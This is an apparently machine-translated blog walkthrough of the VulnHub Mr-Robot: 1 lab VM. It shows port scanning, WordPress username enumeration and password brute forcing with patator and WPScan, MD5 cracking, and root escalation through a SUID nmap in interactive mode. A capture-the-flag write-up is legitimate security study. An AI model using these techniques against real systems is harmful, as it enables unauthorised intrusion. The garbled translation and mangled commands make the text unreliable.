VulnHub: Immersed in the hacking style of the series of Mr. Robot



I think many people watched the show Mr. Robot, every season, gets to know about it more and more people, here and VulnHub not left out. And not so long ago there appeared Boot2Root VM Mr-Robot: 1. Her decision, we will look at today.

The reverse will not be here, but some examples will demonstrate, how due to correct permissions on critical files, your system can be hacked. And so, to begin, you need to get 3 keys.

the

Key 1


Get a list of ports already known way:

the 
$ sudo arp-scan -l-I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap-sV

80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd

Next, run robotscan, which we've used in one of the articles:

the 
$ ./robotscan.py -u 'http://192.168.1.29' -e txt,php w /usr/share/dirb/wordlists/big.txt -x 403



The first key:

the 
$ curl http://192.168.1.29/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

the

Key 2


As you can see, there is still 1 not typical for WordPress file: fsocity.dic. As it turned out, it's a ready-made dictionary for Brutus. It remains to remove the duplicates:

the 
$ sort-u fsocity.dic > fsocity_sort.dic

WPScan refused to search for available users, so you'll have to do it the other way:
PS WPScan examines URL: target_url/?author=$id
At that time, as the default for authorization, the script wp-login.php returns "Invalid username" if the user is not found, and "The password you entered for the username $username is incorrect"

the 
$ sudo patator http_fuzz url=http://192.168.1.29/wp-login.php method=POST body='log=FILE0&pwd=nn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.29%2Fwp-admin%2F&testcookie=1' follow=1 accept_cookie=1 0=./fsocity_sort.dic -x ignore:fgrep='Invalid username'

And after a while we get the output:
22:28:26 patator INFO — 200 4093:3643 0.262 | Elliot | 5474 | HTTP/1.1 200 OK
22:28:26 patator INFO — 200 4093:3643 0.276 | elliot | 5473 | HTTP/1.1 200 OK
22:28:27 patator INFO — 200 4093:3643 0.235 | ELLIOT | 5475 | HTTP/1.1 200 OK

The username is left to guess the password. As a dictionary, use the same file:

the 
$ sudo ./wpscan.rb --url 192.168.1.29 --threads 50 --wordlist ./fsocity_sort.elliot dic --username



Will procinema yourself shell using Metasploit:



First examine the contents of the directory from users:



The key here, but you need a credit user robot. Opening a second file is available, we find the information we need:

the 
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Left to decrypt MD5 at the nearest online service: abcdefghijklmnopqrstuvwxyz.

Log in the dev and get a second key:



the

Key 3


The third key is probably the user root. View available SUID application:

the 
$ find / -perm -4000 2>/dev/null



Nothing is normal, except nmap's. After starting without parameters, get help, and a potential vulnerability:



As told to MrRobot:
to Hack them was easy, they used an old version of nmap'and with support for interactive mode, and not working right, so I can easily get root access

the 
$ nmap --interactive



From interactive mode, run the shell !sh, and pick up the last key:



That's all. Another confirmation of this as not true rights, resulted in the compromise of the system!
Article based on information from habrahabr.ru

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

Templates ESKD and GOST 7.32 for Lyx 1.6.x

Изображение
for more than six months I use a word processor Lyx. Built-in templates is more than enough to write lecture notes, prepare for seminars and to do simple reports for laboratory work. But last semester I had to make two course of the project in accordance with the requirements ESKD. I have begun work in Lyx, but without special templates of documents, my reports in the editor looked like this: A little work, a little reading of the document "Customizing LyX: Features for the Advanced User" and it turned out where the beam: You can use immediately. If you have experience of working in Lyx, problems will not arise. Just in case the attached sample documents. Description of how to make such templates are not yet doing. Someone will ask — will tell. ESKD Screenshot menu select unit type: Group "sections and subsections" appeared due to the fact that the document can be sections with sections without subsections — for their handling of para...
Далее...

Monitoring PostgreSQL + php-fpm + nginx + disk using Zabbix

Изображение
a Lot of information in the network according to Zabbix, and a lot of bespoke templates, I want to introduce to the audience his modification. Zabbix is a very convenient and flexible monitoring tool. Want a hundred monitor, I want a thousand stations, and do not want to — watch a single server, take the cream in all sections. I would not mind to give to github, if anyone collects similar. It so happened that we decided to put on the hosting database wrapper php-fpm+nginx. As the database is postgres. Thoughts to collect data on the machine was before the purchase of hosting is needed, this is useful! Magic kick up the backside to the implementation of the system gave the brakes a hard drive on our VDS stations at the beginning of the script every minute, put the time and measured by the speed in the file, and then build graphs in Excel to compare to as it was/became, take quantitative statistics. And this is just one option! And suddenly the fault is not VDS, and our a...
Далее...

Custom table in MODx Revolution

Изображение
In this article we will examine the following questions: the Creating custom tables for MODx Revolution. the Generation of XML schema and php files classes for xPDO. the Work with custom tables. One of the biggest difficulties in migrating from Evolution to Revolution — an xPDO IMHO. After all, as was previously just got into the muscle via phpMyAdmin, created a sign, and work with it, sending pure SQL queries through $modx->db. Now any changes to the database do not much bother $modx except full drop tables, etc. As linked xPDO and MODx (or rather $modx), I wrote here . Consider the difficulties in working with custom tables in MODx Revolution — a considerable obstacle for many programmers. But really, it's not so difficult. All of the following, the algorithm in three words: the via phpMyAdmin (or other convenient tool to use) to create the needed tables the Using the attached code is generated for the necessary work xPDO files the Using the $...
Далее...